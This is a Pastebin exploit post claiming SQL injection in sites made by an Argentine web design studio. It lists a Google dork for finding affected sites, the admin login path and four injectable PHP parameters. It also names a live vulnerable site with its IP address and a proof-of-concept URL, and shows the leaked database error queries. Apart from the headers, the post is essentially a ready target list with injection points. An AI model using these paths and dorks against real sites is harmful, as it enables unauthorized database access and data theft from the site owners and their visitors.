Advertisement
KingSkrupellos

EstudioNeoFilms Web Design Argentina SQL Injection

Jan 9th, 2019
312
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.06 KB | None | 0 0
  1. ################################################################
  2.  
  3. # Exploit Title : EstudioNeoFilms Web Design Argentina SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/01/2019
  7. # Vendor Homepage : estudioneofilms.com.ar
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''www.estudioneofilms.com.ar"
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # Cyberizm Exploit Reference Link :
  15. cyberizm.org/cyberizm-estudioneofilms-web-design-argentina-sql-injection.html
  16.  
  17. ################################################################
  18.  
  19. # Admin Panel Login Path :
  20. ************************
  21.  
  22. /admin/
  23.  
  24. # SQL Injection Exploit :
  25. ***********************
  26.  
  27. /novedades.php?id=[SQL Injection]
  28.  
  29. /productos.php?id=[SQL Injection]
  30.  
  31. /descargas.php?id=[SQL Injection]
  32.  
  33. /merchandising.php?pg=[ID-NUMBER]&c=[SQL Injection]
  34.  
  35. ################################################################
  36.  
  37. # Example Vulnerable Site =>
  38. ***************************
  39.  
  40. Note => 192.145.234.162 => Vulnerable IP Address.
  41.  
  42. [+] venturi.com.ar/novedades.php?id=3%27 =>
  43.  
  44. [ Proof of Concept ] => archive.fo/WqWgz
  45.  
  46. ################################################################
  47.  
  48. # SQL Database Error :
  49. *********************
  50.  
  51. SELECT * FROM noticias WHERE id_noticia=3'
  52.  
  53. SELECT * FROM familia_productos WHERE idioma LIKE 'es' AND id_producto = 1'
  54.  
  55. SELECT * FROM descargas d, categorias_x_descarga cd, categorias_descarga c
  56. WHERE d.id_descarga=cd.id_descarga AND cd.id_categoria=7' AND
  57. cd.id_categoria=c.id_categoria AND c.descripcion_es NOT LIKE '' AND
  58. d.nombre_es NOT LIKE '' GROUP BY d.id_descarga
  59.  
  60. SELECT * FROM merchandising WHERE categoria=2'
  61. AND nombre_es NOT LIKE '' LIMIT 0,6
  62.  
  63. ################################################################
  64.  
  65. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  66.  
  67. ################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement